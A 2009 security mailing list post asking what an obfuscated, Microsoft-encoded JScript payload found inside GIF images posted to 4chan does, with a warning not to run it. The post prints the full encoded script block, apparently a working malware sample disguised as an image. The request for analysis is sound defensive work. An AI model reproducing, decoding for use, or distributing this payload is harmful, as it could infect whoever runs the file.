PaulDotCom mailing list archives
Obfuscated Javascript in a JSE in an Image
From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Sat, 7 Feb 2009 15:56:23 -0500
Ok, I found these images on 4chan that have encoded javascript in them, you have to safe the gif as a jse to run them (but don't!!!, I'm just uploading the images to a forum so you can see what they are). Exactly how is this encoded, and can anyone tell what it does? This seems to be the script part: GIF89aI = "x1!??"; #@~^pwkAAA==-mD~XtMP',xAPzmOk7+p6(L+1O`rH/Xhs c(tSuKPKr#I@ #@&-lMPd4VV~x,xnh,)1Yr7+or4N+1O`rjmMk2Oc?tsVr#i@#@&-lMP6/GPx~ +APz^Yb\np}4Ln^D`E?1.bwObxTRsbVjXkYn:}4%n1YJ*I@ #@&\lM~r+,',xnh~)1Yr\pr(Ln^D`J(UD+.xOA62^WM+Dcba2VbmCYbWUE*i@#@&@#@&r?Ji@#@&dtV^R^E..xOfb.+1YG.HP'~WkW oOUwn1kmVsKV9nDv bi@#@&d4VVc.E `J1h[PJm,mGwz~'JEP3~UC d1Dk2OwEsVgCs+~3Pr-J,/HdRN/nJ*i@#@&DDX,`@#@&J?Jp@#@&P,P,/4+sscDnoq.kD+cE_|Ziw'?G0DAmDn'-tkmMWkG0D-wbx[GS/-'/EMD+ O#+M/bWU-w]!xw-kz/N/nEBPJAd1DrwD~J4~rP3P0kWcL+D?2+1kCswWV9nDv #,Q~J'-kXdR%dJbi@#@&8,mCO1t`nb, N@#@&@#@&h4bV`F*PP~YMX~ @#@&@#@&,PP,atMRWanU`roYE~~E4YOw=&zb:L WmtCUcW.oJ8JJS,!*i@#@&J?rI@#@&P~P,64.c/+D]+$E+kOu+mNDcJ(W HGNbWkNRjbxmnEBPU+S~GlO`Z##p@#@&~P,PatMRdn N`*I@ #@&PP,~-lMPalL+~x,64Dc.+kwGUk+KnaDi@#@&@#@&,P~,YMXPP@ #@&~P,P~P,Pa4MRWanxvJoOE~,wmonRhCDm4`J@!l,t.n6'Jc4DY2)'&'zrso'Rc1tmU-cW.o'z8wJ/D1wz'N_' Rc#J#,FDS,!bi@#@&J?ri@#@&,PP~~,P~64.c/n Nv#i@#@&,~P,P~P,\C.,k:,xP +h,)^Yb\(64%n1YcJz[W94 jDD+Chr#I@#@&~,P~,P,PksRsGNPxP2i@#@&,PP,~P,Pks OXa+,'~FI@#@&P~P,~P,PrhcWwnUv#I@#@&~,P~,P,PksRS.kD+c64D ./wKU/AW9zbi@#@&,P~P~~,Pr:cdl7+PGwkVncrL Lknr~~y#p@#@&r?Jp@#@&,P~P,P~~kt+^sRMExvEA/1DbwOP&8,L LknJ*i@#@&,PP~N,mCY14v+b, )@#@&@#@&,~P,\CD,4[.HP',cJr_HmO4RMl NG:cb*RdE(dYM`+bp@#@&~~,P-lM~4+C9P{PJ'D'UO J~_,4[.HP_,E-M-x;GUYxDO9kd2K/rYbGx=PWGM:O[CDlIP Cs+xri@ #@&@#@&P,~P7l.Pal.O8P',W/KRWanUK6DsrVncrXE~,+~,FbI@#@&J?EI@#@&~P,~al.DFchDbYctl[P3PE./YKwD'x-MwUJ,_,wCon slOm4cz@!/2C Pk[xrxGY4.l[v-9_#J#]qT,_~tl[~3PJ!20bV+p~Wk^+ lh+xCcor0'.- -.w J#I@#@&P~P,2mDO8R1VWk+vbi@#@&@#@&,P~~7lD,2lMY ,x~0kWcW2+UP6Osbs+vJ"EBP S~8#I@#@&E?ri@#@&P,PPalMO ch.kD+ccrJ_tCY4RDmU[Ws`*# /;8kY.`ybP3P4nmNPQ~r:GNwM-U'D'xDobdY'Dwx OE~3P49.X,_PrRR-M- Jbi@#@&,P~PaCDD ^^W/nc*i@ #@&@#@&,P~,/4+V^RM;xvJ^:9P&^,mWazPJ4PHQdXkRN/n_"~aJSPZSP8#I@#@&@#@&~~,P-lM~aWdDP{Pxh,)mDk-+or8%mYvEb9WN( jYM+m:E#I@#@&J?Ei@#@&P,P~2K/Y hKNnP{~2i@#@&P,PPaWkORDX2+,'~qp@#@&,~P,wWkO Wa+ `bi@#@&,P~PaG/DRsGmNs.GssrVcrwE*i@#@&@#@&P,~PDDzPP@#@&~,PP,~P,k+cUC\bomYn`E4DY2)J&kso *1tlU KDLz(&r#I@#@&,PP,P,~P9W~ @#@&~~,PP,~P,PP, jCc/^+nwcqZ!bi@ #@&J?ri@#@&,PP~~,P~8,A4ksPvk+cDCNH?OlD+~Z{Pc*I@#@&PP,~~P,Pb+ /OGa`bi@ #@&P,P~~,PPrncNGm!hxOcmKW3b+,xPrxA/|/Oz^+'p~+XwkMnd'rP3PU+A~GlO+vT#,_~EpPwCO4'&i,[K:Cbx{Rc1tmURKDLJp@#@&~,PP)~mmYm4cn#, )@#@&@#@&E?ri@#@&,~P,64.cWwnUvJ2WkOr~~rtDYw=zJ[lDR*m4lU KDoJ8zb:o(GCD9Rat2JS~Z#I@#@&~P,Pa4MR/nO"+5EdDCnmND`rZKUYxOO:X2nr~PrhE^YkaC.YJ0KDhO[CDlIP(GE NC.H'J~Q,4[DHbp@#@&,P,P64Dcd+ NcwK/Obp@#@&@#@&P,PPqjuRkV+2`XTZ!T#p@ #@&@#@&N~1lY^4v+bPPN,8@#@&VKACAA==^#~@ If you wan to see the gifs in question, look at this post: http://www.binrev.com/forums/index.php?showtopic=40285&hl= Adrian -------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090207/8149cac0/attachment.htm
Current thread:
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 07)
- Obfuscated Javascript in a JSE in an Image Tim Mugherini (Feb 07)
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 08)
- Obfuscated Javascript in a JSE in an Image Alvaro (Feb 11)
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 11)
- Obfuscated Javascript in a JSE in an Image PJ McGarvey (Feb 12)
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 13)
- Obfuscated Javascript in a JSE in an Image Adrian Crenshaw (Feb 08)
- Obfuscated Javascript in a JSE in an Image Tim Mugherini (Feb 07)